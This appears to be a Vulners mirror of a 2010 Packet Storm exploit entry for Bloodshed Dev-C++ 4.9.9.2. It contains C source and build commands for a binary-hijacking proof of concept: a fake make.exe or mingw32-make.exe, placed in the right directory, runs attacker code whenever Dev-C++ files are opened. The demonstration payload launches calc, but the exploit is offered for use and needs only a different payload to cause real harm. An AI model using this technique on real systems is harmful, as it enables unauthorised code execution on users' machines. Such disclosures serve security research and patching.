Lucene search
K

Bloodshed Dev-C++ 4.9.9.2 Binary Hijacking Exploit

🗓️ 26 Aug 2010 00:00:00Reported by stormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

Bloodshed Dev-C++ Binary Hijacking Exploit on Windows Vist

Code
`/*  
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)  
Date: August 25, 2010  
Author: storm ([email protected])  
Version: 4.9.9.2  
Tested on: Windows Vista SP2  
  
http://www.gonullyourself.org/  
  
gcc -o make.exe Dev-C++-Binary.c  
gcc -o mingw32-make.exe Dev-C++-Binary.c  
  
...and place in appropriate directory. Executes your code four times.  
  
Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.  
  
*/  
  
#include <windows.h>  
  
int main()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation